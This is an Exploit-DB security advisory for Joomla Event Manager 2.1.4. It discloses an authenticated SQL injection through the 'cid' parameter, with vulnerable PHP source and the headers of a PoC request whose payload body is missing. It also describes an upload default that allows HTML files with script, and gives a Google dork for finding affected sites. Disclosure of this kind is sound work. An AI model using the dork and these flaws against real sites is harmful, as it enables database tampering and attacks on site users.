Joomla Event Manager 2.1.4 - Multiple Vulnerabilities

ID EDB-ID:37767
Type exploitdb
Reporter Martino Sani
Modified 2015-08-13T00:00:00


Joomla Event Manager 2.1.4 - Multiple Vulnerabilities. Webapps exploits for multiple platform

                                            # Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
# Google Dork: inurl:option=com_jem
# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage:
# Software Link:
# Version: 2.1.4
# CVE: -


##1 SQL Injection

  Resource: index.php?option=com_jem&view=myevents
  Parameter: cid

  Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event.

### Source Code

  File: sites/models/myevents.php

  function publish($cid = array(), $publish = 1)
     if (is_array($cid) && count($cid)) {
        $cids = implode(',', $cid);
        $query = 'UPDATE #__jem_events'
	  . ' SET published = '. (int) $publish
	  . ' WHERE id IN ('. $cids .')'
	  . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';

### PoC

  POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 352


##2 Insecure File Upload

  Default JEM settings allows to upload HTML/HTM files as event's attachment.
  An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript).
  These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.

  Attachments process is handled by "/site/classes/attachments.class.php" file.
  File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file.



  08-01-2015: Vendor notification.
  08-12-2015: Vendor fixes the issues in the development branch.

  The author is not responsible for the misuse of the information provided in this security advisory.